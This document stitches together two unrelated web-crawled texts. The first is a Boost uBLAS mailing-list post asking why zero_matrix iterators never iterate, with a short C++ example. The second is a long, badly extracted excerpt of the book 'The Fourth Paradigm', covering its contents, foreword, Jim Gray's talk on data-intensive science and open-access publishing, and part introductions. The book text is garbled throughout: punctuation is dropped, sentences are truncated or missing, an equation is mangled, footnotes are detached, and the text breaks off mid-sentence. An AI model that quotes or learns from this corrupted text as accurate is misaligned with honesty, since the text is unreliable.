Subject: [ublas] zero_matrix iteration From: Marco Guazzone (marco.guazzone_at_[hidden]) Date: 2009-09-13 14:33:41 Hello dears, I've noticed that zero_matrix is "not iteratable". That is if you iterate a zero_matrix Z either by-row or by-column the condition "Z.begin1() != Z.end1()" or "Z.begin1() != Z.end2()", respectively, is always FALSE (according to how zero_matrix iterators are defined). However if you iterate by using plain row/column indices (instead of iterators) you're successfully able to iterate through a zero_matrix. Is this conceptually right? I mean, in my opinion a zero_matrix(N,M) should be iteratable just like any other ordinary matrix, both with iterators and with simple indices. By preventing iteration (with iterators) it would seem that the matrix has size 0, while it has a precise dimension (NxM) What do you think? Just for curiosity, I've looked at MTL4. It seems MTL4 does not have a zero-matrix type. Rather you assign a scalar 0 to a matrix type or you call the set_to_zero function. The resulting matrix seems to be iteratable. The code below shows an example of what I said above: ---[code]--- #include <boost/numeric/ublas/matrix.hpp> #include <iostream> int main() { typedef double value_type; typedef boost::numeric::ublas::zero_matrix<value_type> matrix_type; matrix_type Z(5,4); std::cout << "Iteration by ITERATORS" << std::endl; for (matrix_type::const_iterator1 row_it = Z.begin1(); row_it != Z.end1(); ++row_it) { std::cout << "Iteration by ITERATORS: never entered" << std::endl; for (matrix_type::const_iterator2 col_it = row_it.begin(); col_it != row_it.end(); ++col_it) { matrix_type::size_type row(col_it.index1()); matrix_type::size_type col(col_it.index2()); std::cout << "Z(" << row << "," << col << ") = " << *col_it << " ==> " << value_type(0) << std::endl; } } std::cout << "Iteration by INDICES" << std::endl; for (matrix_type::size_type row = 0; row < Z.size1(); ++row) { for (matrix_type::size_type col = 0; col < Z.size2(); ++col) { std::cout << "Z(" << row << "," << col << ") = " << Z(row, col) << " ==> " << value_type(0) << std::endl; } } } ---[/code]--- Cheers!! -- Marco
https://lists.boost.org/ublas/2009/09/3723.php
CC-MAIN-2020-24
en
refinedweb
Fourth P aradigm Edited by Tony Hey, Stewart Tansley, and Kristin Tolle D a t a -I n t e n s i v e S c i e n t i f i c D i s c o v e r y T H E F o u r th P a r a d i g m The F o u r th D ata -I n t e n s i v e S c i e n t i f i c D i s c o v e r y Paradigm Copyright 2009 Microsoft Corporation Except where otherwise noted, content in this publication is licensed under the Creative Commons AttributionShare Alike 3.0 United States license, available at. org/licenses/by-sa/3.0. Second printing, version 1.1, October 2009. ISBN 978-0-9825442-0-4 Printed in the United States of America. Microsoft, Amalga, Bing, Excel, HealthVault, Microsoft Surface, SQL Server, Virtual Earth, and Windows are trademarks of the Microsoft group of companies. All other trademarks are property of their respective owners. The information, findings, views, and opinions contained in this publication are those of the authors and do not necessarily reflect the views of Microsoft Corporation or Microsoft Research. Microsoft Corporation does not guarantee the accuracy of any information provided herein. Microsoft Research For Jim co n t e n ts xi foreword Gordon Bell xvii jim gray on e science : a transformed scientific method Edited by Tony Hey, Stewart Tansley, and Kristin Tolle Dan Fay 5 13 the emerging science of environmental applications redefining ecological science using data a 2020 vision for ocean science 21 James R. Hunt, Dennis D. Baldocchi, Catharine van Ingen John R. Delaney, Roger S. Barga 27 39 45 55 57 75 65 Simon Mercer Michael Gillam, Craig Feied, Jonathan Handler, Eliza Moody, Ben Shneiderman, Catherine Plaisant, Mark Smith, John Dickason Jeff W. Lichtman, R. Clay Reid, Hanspeter Pfister, Michael F. Cohen Eric Horvitz, William Kristan 83 91 99 toward a computational microscope for neurobiology a unified modeling approach to data- intensive healthcare 109 111 117 125 beyond the tsunami : developing the infrastructure to deal with life sciences data multicore computing and scientific discovery parallelism and the cloud the impact of workflow tools on data- centric research semantic e science : encoding meaning in next- generation Charles Hansen, Chris R. Johnson, Valerio Pascucci, Claudio T. Silva Savas Parastatidis a platform for all that we know : creating a knowledge- driven research infrastructure 4. Schol ar ly communication introduction 175 177 185 193 jim gray s fourth paradigm and the construction of the scientific record text in a data- centric world communication system Paul Ginsparg all aboard: toward a machine- friendly scholarly the future of data policy 201 209 215 John Wilbanks Timo Hannay FINAL THOUGHTS the way forward conclusions next steps acknowledgments a few words about jim ... glossary index 223 227 230 231 235 237 241 Foreword based on dataintensiveor less. The contributing authors in this volume have done an extraordinary job of helping to refine an understanding of this new paradigm from a variety of disciplinary perspectives. In many instances, science is lagging behind the commercial world in the ability to infer meaning from data and take action based on that meaning. However, commerce is comparatively simple: things that can be described by a few numbers or a name are manufactured and then bought and sold. Scientific disciplines cannot easily be encapsulated in a few understandable numbers and names, and most scientific data does not have a high enough economic value to fuel more rapid development of scientific discovery. It was Tycho Brahes assistant Johannes Kepler who took Brahes catalog of systematic astronomical observations and discovered the laws of planetary motion. This established the division between the mining and analysis of captured and carefully archived experimental data and the creation of theories. This division is one aspect of the Fourth Paradigm. In the 20th century, the data on which scientific theories were based was often buried in individual scientific notebooks or, for some aspects of big science, stored on magnetic media that eventually become unreadable. Such data, especially from xi individuals or small labs, is largely inaccessible. It is likely to be thrown out when a scientist retires, or at best it will be held in an institutional library until it is discarded. Long-term data provenance as well as community access to distributed data are just some of the challenges. Fortunately, some data places, such as the National Center for Atmospheric Research1 (NCAR), have been willing to host Earth scientists who conduct experiments by analyzing the curated data collected from measurements and computational models. Thus, at one institution we have the capture, curation, and analysis chain for a whole discipline. In the 21st century, much of the vast volume of scientific data captured by new instruments on a 24/7 basis, along with information generated in the artificial worlds of computer models, is likely to reside forever in a live, substantially publicly accessible, curated state for the purposes of continued analysis. This analysis will result in the development of many new theories! I believe that we will soon see a time when data will live forever as archival mediajust. scientiststhe information and computer scientists, database and software engineers and programmers, disciplinary experts, curators and expert annotators, librarians, archivists, and others, who are crucial to the successful management of a digital data collectionlie in having their creativity and intellectual contributions fully recognized. [1] 1 xii FOREWORD In Jim Grays last talk to the Computer Science and Telecommunications Board on January 11, 2007 [2],. The edited version of Jims talk that appears in this book, which was produced from the transcript and Jims slides, sets the scene for the articles that follow. Data-intensive science consists of three basic activities: capture, curation, and analysis. Data comes in all scales and shapes, covering large international experiments; cross-laboratory, single-laboratory, and individual observations; and potentially individuals lives.2 The discipline and scale of individual experiments and especially their data rates make the issue of tools a formidable problem. The Australian Square Kilometre Array of radio telescopes project,3 CERNs Large Hadron Collider,4 and astronomys Pan-STARRS5 array of celestial telescopes are capable of generating several petabytes (PB) of data per day, but present plans limit them to more manageable data collection rates. Gene sequencing machines are currently more modest in their output due to the expense, so only certain coding regions of the genome are sequenced (25 KB for a few hundred thousand base pairs) for each individual. But this situation is temporary at best, until the US$10 million X PRIZE for Genomics6 is won100 people fully sequenced, in 10 days, for under US$10,000 each, at 3 billion base pairs for each human genome. Funding is needed to create a generic set of tools that covers the full range of activitiesfrom capture and data validation through curation, analysis, and ultimately permanent archiving. Curation covers a wide range of activities, starting with finding the right data structures to map into various stores. It includes the schema and the necessary metadata for longevity and for integration across instruments, experiments, and laboratories. Without such explicit schema and metadata, the interpretation is only implicit and depends strongly on the particular programs used to analyze it. Ultimately, such uncurated data is guaranteed to be lost. We 2 3 xiii must think carefully about which data should be able to live forever and what additional metadata should be captured to make this feasible. Data analysis covers a whole range of activities throughout the workflow pipeline, including the use of databases (versus a collection of flat files that a database can access), analysis and modeling, and then data visualization. Jim Grays recipe for designing a database for a given discipline is that it must be able to answer the key 20 questions that the scientist wants to ask of it. Much of science now uses databases only to hold various aspects of the data rather than as the location of the data itself. This is because the time needed to scan all the data makes analysis infeasible. A decade ago, rereading the data was just barely feasible. In 2010, disks are 1,000 times larger, yet disc record access time has improved by only a factor of two. Digital Libraries for Data and Documents: Just Like Modern Document Libraries Scientific communication, including peer review, is also undergoing fundamental changes. Public digital libraries are taking over the role of holding publications from conventional librariesbecause of the expense, the need for timeliness, and the need to keep experimental data and documents about the data together. At the time of writing, digital data libraries are still in a formative stage, with various sizes, shapes, and charters. Of course, NCAR is one of the oldest sites for the modeling, collection, and curation of Earth science data. The San Diego Supercomputer Center (SDSC) at the University of California, San Diego, which is normally associated with supplying computational power to the scientific community, was one of the earliest organizations to recognize the need to add data to its mission. SDSC established its Data Central site,7 which holds 27 PB museums. The Australian National Data Service8 (ANDS) has begun offering services starting with the Register My Data service, a card catalog that registers the identity, structure, name, and location (IP address) of all the various databases, including those coming from individuals. The mere act of registering goes a long way toward organizing long-term storage. The purpose of ANDS is to influence national policy on data management and to inform best practices for the curation 7 8 xiv FOREWORD of data, thereby transforming the disparate collections of research data into a cohesive collection of research resources. In the UK, the Joint Information Systems Committee (JISC) has funded the establishment of a Digital Curation Centre9 to explore these issues. Over time, one might expect that many such datacenters will emerge. The National Science Foundations Directorate for Computer and Information Science and Engineering recently issued a call for proposals for long-term grants to researchers in data-intensive computing and long-term archiving. In the articles in this book, the reader is invited to consider the many opportunities and challenges for data-intensive science, including interdisciplinary cooperation and training, interorganizational data sharing for scientific data mashups, the establishment of new processes and pipelines, and a research agenda to exploit the opportunities as well as stay ahead of the data deluge. These challenges will require major capital and operational expenditure. The dream of establishing a sensors everywhere data infrastructure to support new modes of scientific research will require massive cooperation among funding agencies, scientists, and engineers. This dream must be actively encouraged and funded. REFERENCES [1] National Science Board, Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century, Technical Report NSB-05-40, National Science Foundation, September 2005,. [2] Talk given by Jim Gray to the NRC-CSTB in Mountain View, CA, on January 11, 2007,. (Edited transcript also in this volume.) xv Edited by Tony Hey, Stewart Tansley, and Kristin Tolle | Microsoft Research e have to do better at producing tools to support the whole research cyclefrom data capture and data curation to data analysis and data visualization. Today, the tools for capturing data both at the mega-scale and at the milli-scale are just dreadful. After you have captured the data, you need to curate it before you can start doing any kind of data analysis, and we lack good tools for both data curation and data analysis. Then comes the publication of the results of your research, and the published literature is just the tip of the data iceberg. By this I mean that people collect a lot of data and then reduce this down to some number of column inches in Science or Natureor 10 pages if it is a computer science person writing. So what I mean by data iceberg is that there is a lot of data that is collected but not curated or published in any systematic way. There are some exceptions, and I think that these cases are a good place for us to look for best practices. I will talk about how the whole process of peer review has got to change and the way in which I think it is changing and what CSTB can do to help all of us get access to our research. 1 National Research Council,; Computer Science and Telecommunications Board,. 2 This presentation is, poignantly, the last one posted to Jims Web page at Microsoft Research before he went missing at sea on January 28, 2007. xvii Science Paradigms Thousand years ago: science was empirical describing natural phenomena . 2 a 4Gp c2 = K 2 a 3 a unify theory, experiment, and simulation Data captured by instruments or generated by simulator Processed by software Information/knowledge stored in computer Scientist analyzes database / files using data management and statistics eScience is where IT meets scientists. Researchers are using many different methods to collect or generate datafrom sensors and CCDs to supercomputers and particle colliders. When the data finally shows up in your computer, what do you do with all this information that is now in your digital shoebox? People are continually seeking me out and saying, Help! Ive got all this data. What am I supposed to do with it? My Excel spreadsheets are getting out of hand! So what comes next? What happens when you have 10,000 Excel spreadsheets, each with 50 workbooks in them? Okay, so I have been systematically naming them, but now what do I do? Science Paradigms I show this slide [Figure 1] every time I talk. I think it is fair to say that this insight dawned on me in a CSTB study of computing futures. We said, Look, computational science is a third leg. Originally, there was just experimental science, and then there was theoretical science, with Keplers Laws, Newtons Laws of Motion, Maxwells xviii X-Info The evolution of X-Info and Comp-X for each discipline X How to codify and represent our knowledge Experiments & Instruments Other Archives Literature Simulations Facts F Facts Questions Answers Facts Facts FIGURE 2 a huge increase in data from the experimental sciences. People now do not actually look through telescopes. Instead, they are looking through large-scale, complex instruments which relay data to datacenters, and only then do they look at the information on their computers. [1]. X-Info and Comp-X and the metabolic pathways or the behavior of a cell or the way a protein is built. xix This is similar to Jeannette Wings idea of computational thinking, in which computer science techniques and technologies are applied to different disciplines [2]. The goal for many scientists is to codify their information so that they can exchange it with other scientists. Why do they need to codify their information? Because if I put some information in my computer, the only way you are going to be able to understand that information is if your program can understand the information. This means that the information has to be represented in an algorithmic way. In order to do this, you need a standard representation for what a gene is or what a galaxy is or what a temperature measurement is. Experimental Budgets Are to Software I have been hanging out with astronomers for about the last 10 years, and I get to go to some of their base stations. One of the stunning things for me is that I look at their telescopes and it is just incredible. It is basically 15 to 20 million dollars worth of capital equipment, with about 20 to 50 people operating the instrument. But then you get to appreciate that there are literally thousands of people writing code to deal with the information generated by this instrument and that millions of lines of code are needed to analyze all this information. In fact, the software cost dominates the capital expenditure! This is true at the Sloan Digital Sky Survey (SDSS), and it is going to continue to be true for larger-scale sky surveys, and in fact for many large-scale experiments. I am not sure that this dominant software cost is true for the particle physics community and their Large Hadron Collider (LHC) machine, but it is certainly true for the LHC experiments. Even in the small data sciences, you see people collecting information and then having to put a lot more energy into the analysis of the information than they have done in getting the information in the first place. The software is typically very idiosyncratic since there are very few generic tools that the bench scientist has for collecting and analyzing and processing the data. This is something that we computer scientists could help fix by building generic tools for the scientists. I have a list of items for policymakers like CSTB. The first one is basically to foster both building tools and supporting them. NSF now has a cyberinfrastructure organization, and I do not want to say anything bad about them, but there needs to be more than just support for the TeraGrid and high-performance computing. We now know how to build Beowulf clusters for cheap high-performance computing. But we do not know how to build a true data grid or to build data stores made out of cheap data bricks to be a place for you to put all your data and then analyze the xx information. We have actually made fair progress on simulation tools, but not very much on data analysis tools. Project Pyramids and Pyramid Funding This section is just an observation about the way most science projects seem to work. There are a few international projects, then there are more multi-campus projects, and then there are lots and lots of single-lab projects. So we basically have this Tier 1, Tier 2, Tier 3 facility pyramid, which you see over and over again in many different fields. The Tier 1 and Tier 2 projects are generally fairly systematically organized and managed, but there are only relatively few such projects. These large projects can afford to have both a software and hardware budget, and they allocate teams of scientists to write custom software for the experiment. As an example, I have been watching the U.S.-Canadian ocean observatoryProject Neptuneallocate some 30 percent of its budget for cyberinfrastructure [3]. In round numbers, thats 30 percent of 350 million dollars or something like 100 million dollars! Similarly, the LHC experiments have a very large software budget, and this trend towards large software budgets is also evident from the earlier BaBar experiment [4, 5]. But if you are a bench scientist at the bottom of the pyramid, what are you going to do for a software budget? You are basically going to buy MATLAB3 and Excel4 or some similar software and make do with such off-the-shelf tools. There is not much else you can do. So the giga- and mega-projects are largely driven by the need for some largescale resources like supercomputers, telescopes, or other large-scale experimental facilities. These facilities are typically used by a significant community of scientists and need to be fully funded by agencies such as the National Science Foundation or the Department of Energy. Smaller-scale projects can typically get funding from a more diverse set of sources, with funding agency support often matched by some other organizationwhich could be the university itself. In the paper that Gordon Bell, Alex Szalay, and I wrote for IEEE Computer [6], we observed that Tier 1 facilities like the LHC get funded by an international consortium of agencies but the Tier 2 LHC experiments and Tier 3 facilities get funded by researchers who bring with them their own sources of funding. So funding agencies need to fully fund the Tier 1 giga-projects but then allocate the other half of their funding for cyberinfrastructure for smaller projects. 3 4 xxi To summarize what I have been saying about software, what we need are effectively Laboratory Information Management Systems. Such software systems provide a pipeline from the instrument or simulation data into a data archive, and we are close to achieving this in a number of example cases I have been working on. Basically, we get data from a bunch of instruments into a pipeline which calibrates and cleans the data, including filling in gaps as necessary. Then we re-grid5 the information and eventually put it into a database, which you would like to publish on the Internet to let people access your information. The whole business of going from an instrument to a Web browser involves a vast number of skills. Yet whats going on is actually very simple. We ought to be able to create a Beowulf-like package and some templates that would allow people who are doing wet-lab experiments to be able to just collect their data, put it into a database, and publish it. This could be done by building a few prototypes and documenting them. It will take several years to do this, but it will have a big impact on the way science is done. As I have said, such software pipelines are called Laboratory Information Management Systems, or LIMS. Parenthetically, commercial systems exist, and you can buy a LIMS system off the shelf. The problem is that they are really geared towards people who are fairly rich and are in an industrial setting. They are often also fairly specific to one or another task for a particular communitysuch as taking data from a sequencing machine or mass spectrometer, running it through the system, and getting results out the other side. Information Management and Data Analysis So here is a typical situation. People are collecting data either from instruments or sensors, or from running simulations. Pretty soon they end up with millions of files, and there is no easy way to manage or analyze their data. I have been going door to door and watching what the scientists are doing. Generally, they are doing one of two thingsthey are either looking for needles in haystacks or looking for the haystacks themselves. The needle-in-the-haystack queries are actually very easyyou are looking for specific anomalies in the data, and you usually have some idea of what type of signal you are looking for. The particle physicists are looking 5 This means to regularize the organization of the data to one data variable per row, analogous to relational database normalization. xxii for the Higgs particle at the LHC, and they have a good idea of how the decay of such a heavy particle will look like in their detectors. Grids of shared clusters of computers are great for such needle-in-a-haystack queries, but such grid computers are lousy at trend analysis, statistical clustering, and discovering global patterns in the data. We actually need much better algorithms for clustering and for what is essentially data mining. Unfortunately, clustering algorithms are not order N or N log N but are typically cubic in N, so that when N grows too large, this method does not work. So we are being forced to invent new algorithms, and you have to live with only approximate answers. For example, using the approximate median turns out to be amazingly good. And who would have guessed? Not me! Much of the statistical analysis deals with creating uniform samples, performing some data filtering, incorporating or comparing some Monte Carlo simulations, and so on, which all generates a large bunch of files. And the situation with these files is that each file just contains a bundle of bytes. If I give you this file, you have to work hard to figure out what the data in this file means. It is therefore really important that the files be self-describing. When people use the word database, fundamentally what they are saying is that the data should be self-describing and it should have a schema. Thats really all the word database means. So if I give you a particular collection of information, you can look at this information and say, I want all the genes that have this property or I want all of the stars that have this property or I want all of the galaxies that have this property. But if I give you just a bunch of files, you cant even use the concept of a galaxy and you have to hunt around and figure out for yourself what is the effective schema for the data in that file. If you have a schema for things, you can index the data, you can aggregate the data, you can use parallel search on the data, you can have ad hoc queries on the data, and it is much easier to build some generic visualization tools. In fairness, I should say that the science community has invented a bunch of formats that qualify in my mind as database formats. HDF6 (Hierarchical Data Format) is one such format, and NetCDF7 (Network Common Data Form) is another. These formats are used for data interchange and carry the data schema with them as they go. But the whole discipline of science needs much better tools than HDF and NetCDF for making data self-defining. 6 7 xxiii. The Need for Data Tools: Let 100 Flowers Bloom The suggestion that I have been making is that we now have terrible data management tools for most of the science disciplines. Commercial organizations like Walmart can afford to build their own data management software, but in science we do not have that luxury. At present, we have hardly any data visualization and analysis tools. Some research communities use MATLAB, for example, but the funding agencies in the U.S. and elsewhere need to do a lot more to foster the building of tools to make scientists more productive. When you go and look at what scientists are doing, day in and day out, in terms of data analysis, it is truly dreadful. And I suspect that many of you are in the same state that I am in where essentially the only tools I have at my disposal are MATLAB and Excel! We do have some nice tools like Beowulf 8 clusters, which allow us to get costeffective high-performance computing by combining lots of inexpensive computers. We have some software called Condor9 that allows you to harvest processing cycles from departmental machines. Similarly, we have the BOINC10 (Berkeley Open Infrastructure for Network Computing) software that enables the harvesting of PC cycles as in the SETI@Home project. And we have a few commercial products like MATLAB. All these tools grew out of the research community, and I cannot figure out why these particular tools were successful. We also have Linux and FreeBSD Unix. FreeBSD predated Linux, but somehow Linux took off and FreeBSD did not. I think that these things have a lot to do with the community, the personalities, and the timing. So my suggestion is that we should just have lots of things. We have commercial tools like LabVIEW,11 8 9 xxiv for example, but we should create several other such systems. And we just need to hope that some of these take off. It should not be very expensive to seed a large number of projects. The Coming Revolution in Scholarly Communication I have reached the end of the first part of my talk: it was about the need for tools to help scientists capture their data, curate it, analyze it, and then visualize it. The second part of the talk is about scholarly communication. About three years ago, Congress passed a law that recommended that if you take NIH (National Institutes of Health) funding for your research, you should deposit your research reports with the National Library of Medicine (NLM) so that the full text of your papers should be in the public domain. Voluntary compliance with this law has been only 3 percent, so things are about to change. We are now likely to see all of the publicly funded science literature forced online by the funding agencies. There is currently a bill sponsored by Senators Cornyn and Lieberman that will make it compulsory for NIH grant recipients to put their research papers into the NLM PubMed Central repository.12 In the UK, the Wellcome Trust has implemented a similar mandate for recipients of its research funding and has created a mirror of the NLM PubMed Central repository. But the Internet can do more than just make available the full text of research papers. In principle, it can unify all the scientific data with all the literature to create a world in which the data and the literature interoperate with each other [Figure 3 on the next page].! Take the example of somebody who is working for the National Institutes of Healthwhich is the case being discussed herewho produces a report. Suppose he discovers something about disease X. You go to your doctor and you say, Doc, Im not feeling very well. And he says, Andy, were going to give you a bunch of tests. And they give you a bunch of tests. He calls you the next day and says, 12 See Peter Subers Open Access newsletter for a summary of the current situation: newsletter/01-02-08.htm. xxv FIGURE 3 Theres nothing wrong with you. Take two aspirins, and take some vacation. You go back a year later and do the same thing. Three years later, he calls you up and says, Andy, you have X! We figured it out! You say, Whats X? He says, I have no idea, its a rare disease, but theres this guy in New York who knows all about it. So you go to Google13 and type in all your symptoms. Page 1 of the results, up comes X. You click on it and it takes you to PubMed Central and to the abstract All About X. You click on that, and it takes you to the New England Journal of Medicine, which says, Please give us $100 and well let you read about X. You look at it and see that the guy works for the National Institutes of Health. Your tax dollars at work. So Lieberman14 and others have said, This sucks. Scientific information is now peer reviewed and put into the public domainbut only in the sense that anybody can read it if theyll pay. Whats that about? Weve already paid for it. The scholarly publishers offer a service of organizing the peer review, printing the journal, and distributing the information to libraries. But the Internet is our distributor now and is more or less free. This is all linked to the thought process that society is going through about where intellectual property begins and ends. The scientific literature, and peer reviewed literature in particular, is probably one of the places where it ends. If you want to find out about X, you will probably be 13 14 Or, as Jim might have suggested today, Bing. The Federal Research Public Access Act of 2006 (Cornyn-Lieberman). xxvi able to find out that peach pits are a great treatment for X. But this is not from the peer reviewed literature and is there just because theres a guy out there who wants to sell peach pits to you to cure X. So the people who have been pioneering this movement towards open access are primarily the folks in healthcare because the good healthcare information is locked up and the bad healthcare information is on the Internet. The New Digital Library How does the new library work? Well, its free because its pretty easy to put a page or an article on the Internet. Each of you could afford to publish in PubMed Central. It would just cost you a few thousand dollars for the computerbut how much traffic you would have I dont know! But curation is not cheap. Getting the stuff into the computer, getting it cross-indexed, all that sort of stuff, is costing the National Library of Medicine about $100 to curate each article that shows up. If it takes in a million articles a year, which is approximately what it expects to get, its going to be $100 million a year just to curate the stuff. This is why we need to automate the whole curation process. What is now going on is that PubMed Central, which is the digital part of the National Library of Medicine, has made itself portable. There are versions of PubMed Central running in the UK, in Italy, in South Africa, in Japan, and in China. The one in the UK just came online last week. I guess you can appreciate, for example, that the French dont want their National Library of Medicine to be in Bethesda, Maryland, or in English. And the English dont want the text to be in American, so the UK version will probably use UK spellings for things in its Web interface. But fundamentally, you can stick a document in any of these archives and it will get replicated to all the other archives. Its fairly cheap to run one of these archives, but the big challenges are how you do curation and peer review. Overlay Journals Heres how I think it might work. This is based on the concept of overlay journals. The idea is that you have data archives and you have literature archives. The articles get deposited in the literature archives, and the data goes into the data archives. Then there is a journal management system that somebody builds that allows us, as a group, to form a journal on X. We let people submit articles to our journal by depositing them in the archive. We do peer review on them and for the ones we like, we make a title page and say, These are the articles we like and put it into xxvii the archive as well. Now, a search engine comes along and cranks up the page rank on all of those articles as being good because they are now referenced by this very significant front page. These articles, of course, can also point back to the data. Then there will be a collaboration system that comes along that allows people to annotate and comment on the journal articles. The comments are not stored in the peer reviewed archive but on the side because they have not been peer reviewed though they might be moderated. The National Library of Medicine is going to do all this for the biomedical community, but its not happening in other scientific communities. For you as members of the CSTB, the CS community could help make this happen by providing appropriate tools for the other scientific disciplines. There is some software we have created at Microsoft Research called Conference Management Tool (CMT). We have run about 300 conferences with this, and the CMT service makes it trivial for you to create a conference. The tool supports the whole workflow of forming a program committee, publishing a Web site, accepting manuscripts, declaring conflicts of interest and recusing yourself, doing the reviews, deciding which papers to accept, forming the conference program, notifying the authors, doing the revisions, and so on. We are now working on providing a button to deposit the articles into arXiv.org or PubMed Central and pushing in the title page as well. This now allows us to capture workshops and conferences very easily. But it will also allow you to run an online journal. This mechanism would make it very easy to create overlay journals. Somebody asked earlier if this would be hard on scholarly publishers. And the answer is yes. But isnt this also going to be hard for the IEEE and the ACM? The answer is that the professional societies are terrified that if they dont have any paper to send you, you wont join them. I think that they are going to have to deal with this somehow because I think open access is going to happen. Looking around the room, I see that most of us are old and not Generation Xers. Most of us join these organizations because we just think its part of being a professional in that field. The trouble is that Generation Xers dont join organizations. What Happens to Peer Review? This is not a question that has concerned you, but many people say, Why do we need peer review at all? Why dont we just have a wiki? And I think the answer is that peer review is different. Its very structured, its moderated, and there is a degree of confidentiality about what people say. The wiki is much more egalitarian. xxviii I think wikis make good sense for collecting comments about the literature after the paper has been published. One needs some structure like CMT provides for the peer review process. Publishing Data I had better move on and go very quickly through publishing data. Ive talked about publishing literature, but if the answer is 42, what are the units? You put some data in a file up on the Internet, but this brings us back to the problem of files. The important record to show your work in context is called the data provenance. How did you get the number 42? Here is a thought experiment. Youve done some science, and you want to publish it. How do you publish it so that others can read it and reproduce your results in a hundred years time? Mendel did this, and Darwin did this, but barely. We are now further behind than Mendel and Darwin in terms of techniques to do this. Its a mess, and weve got to work on this problem. Data, Information, and Knowledge: Ontologies and Semantics We are trying to objectify knowledge. We can help with basic things like units, and what is a measurement, who took the measurement, and when the measurement was taken. These are generic things and apply to all fields. Here [at Microsoft Research] we do computer science. What do we mean by planet, star, and galaxy? Thats astronomy. Whats the gene? Thats biology. So what are the objects, what are the attributes, and what are the methods in the object-oriented sense on these objects? And note, parenthetically, that the Internet is really turning into an objectoriented system where people fetch objects. In the business world, theyre objectifying what a customer is, what an invoice is, and so on. In the sciences, for example, we need similarly to objectify what a gene iswhich is what GenBank15 does. And here we need a warning that to go further, you are going to bump into the O word for ontology, the S word for schema, and controlled vocabularies. That is to say, in going down this path, youre going to start talking about semantics, which is to say, What do things mean? And of course everybody has a different opinion of what things mean, so the conversations can be endless. The best example of all of this is Entrez,16 the Life Sciences Search Engine, 15 16 xxix! So in this world, we have traditionally had authors, publishers, curators, and consumers. In the new world, individual scientists now work in collaborations, and journals are turning into Web sites for data and other details of the experiments. Curators now look after large digital archives, and about the only thing the same is the individual scientist. It is really a pretty fundamental change in the way we do science. One problem is that all projects end at a certain point and it is not clear what then happens to the data. There is data at all scales. There are anthropologists out collecting information and putting it into their notebooks. And then there are the particle physicists at the LHC. Most of the bytes are at the high end, but most of the datasets are at the low end. We are now beginning to see mashups where people take datasets from various places and glue them together to make a third dataset. So in the same sense that we need archives for journal publications, we need archives for the data. So this is my last recommendation to the CSTB: foster digital data libraries. Frankly, the NSF Digital Library effort was all about metadata for libraries and not about actual digital libraries. We should build actual digital libraries both for data and for the literature. Summary I wanted to point out that almost everything about science is changing because of the impact of information technology.. xxx Editors Note The full transcript and PowerPoint slides from Jims talk may be found at the Fourth Paradigm Web site.17 The questions and answers during the talk have been extracted from this text and are available on the Web site. (Note that the questioners have not been identified by name.) The text presented here includes minor edits to improve readability, as well as our added footnotes and references, but we believe that it remains faithful to Jims presentation. References [1] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 12971298, 2009, doi: 10.1126/science.1170411. [2] J. Wing, Computational Thinking, Comm. ACM, vol. 49, no. 3, Mar. 2006, doi: 10.1145/1118178.1118215. [3] NSF Regional Scale Nodes,. [4] Large Hadron Collider (LHC) experiments, LHCExperiments-en.html. [5] BaBar,. [6] G. Bell, J. Gray, and A. Szalay, Petascale Computational Systems, IEEE Computer, pp. 110112, vol. 39, 2006, doi: 10.1109/MC.2006.29. 17 xxxi E A RT H A N D E N V I R O N M E N T Introduction hange is inevitablethe Universe expands, nature adapts and evolves, and so must the scientific tools and technologies that we employ to feed our unrelenting quest for greater knowledge in space, Earth, and environmental sciences. The opportunities and challenges are many. New computing technologies such as cloud computing and multicore processors cannot provide the entire solution in their generic forms. But effective and timely application of such technologies can help us significantly advance our understanding of our world, including its environmental challenges and how we might address them. With science moving toward being computational and data based, key technology challenges include the need to better capture, analyze, model, and visualize scientific information. The ultimate goal is to aid scientists, researchers, policymakers, and the general public in making informed decisions. As society demands action and responsiveness to growing environmental issues, new types of applications grounded in scientific research will need to move from raw discovery and eliciting basic data that leads to knowledge to informing practical decisions. Active issues such as climate change will not wait until scientists have all the data to fill their knowledge gaps. As evidenced by the articles in this part of the book, scientists are indeed actively pursuing scientific understanding through the use of new computing technologies. Szalay and Blakeley describe Jim Grays informal rules for data-centric development and how they serve as a blueprint for making large-scale datasets available through the use of databases, leveraging the built-in data management as well as the parallel processing inherent in SQL servers. In order to facilitate informed decisions based on reliable scientific evidence, Dozier and Gail explore how the applied use of technology and current scientific knowledge is key to providing tools to policy and decision makers. Hunt, Baldocchi, and van Ingen describe the changes under way in ecological science in moving from science in the small to large collaborations based on synthesis of data. These aggregated datasets expose the need for collaborative tools in the cloud as well as easy-to-use visualization and analysis tools. Delaney and Barga then provide compelling insights into the need for real-time monitoring of the complex dynamics in the sea by creating an interactive ocean laboratory. This novel cyberinfrastructure will enable new discoveries and insights through improved ocean models. The need for novel scientific browsing technologies is highlighted by Goodman and Wong. To advance the linkage across existing resources, astronomers can use a new class of visualization tools, such as the WorldWide Telescope (WWT). This new class of tool offers access to data and information not only to professional scientists but also the general public, both for education and possibly to enable new discoveries by anyone with access to the Internet. Finally, Lehning et al. provide details about the use of densely deployed real-time sensors combined with visualization for increased understanding of environmental dynamicslike a virtual telescope looking back at the Earth. These applications illustrate how scientists and technologists have the opportunity to embrace and involve citizen scientists in their efforts. In Part 1 and throughout the book, we see new sensors and infrastructures enabling real-time access to potentially enormous quantities of data, but with experimental repeatability through the use of workflows. Service-oriented architectures are helping to mitigate the transition to new underlying technologies and enable the linkage of data and resources. This rapidly evolving process is the only mechanism we have to deal with the data deluge arising from our instruments. The question before us is how the worlds intellectual and technological resources can be best orchestrated to authoritatively guide our responses to current and future societal challenges. The articles that follow provide some great answers. E A RT H A N D E N V I R O N M E N T Ale xander S. Szal ay The Johns Hopkins University Jos A . Bl ake ley Microsoft has created a major challenge for cutting-edge scientific projects. With datasets growing beyond a few tens of terabytes, scientists have no off-the-shelf solutions that they can readily use to manage and analyze the data [1]. Successful projects to date have deployed various combinations of flat files and databases [2]. However, most of these solutions have been tailored to specific projects and would not be easy to generalize or scale to the next generation of experiments. Also, todays computer architectures are increasingly imbalanced; the latency gap between multi-core CPUs and mechanical hard disks is growing every year, making the challenges of data-intensive computing harder to overcome [3]. What is needed is a systematic and general approach to these problems with an architecture that can scale into the future. he explosion in scientific data Grays Laws Jim Gray formulated several informal rulesor lawsthat codify how to approach data engineering challenges related to large-scale scientific datasets. The laws are as follows: 1. Scientific computing is becoming increasingly data intensive. 2. The solution is in a scale-out architecture. 3. Bring computations to the data, rather than data to the computations. 4. Start the design with the 20 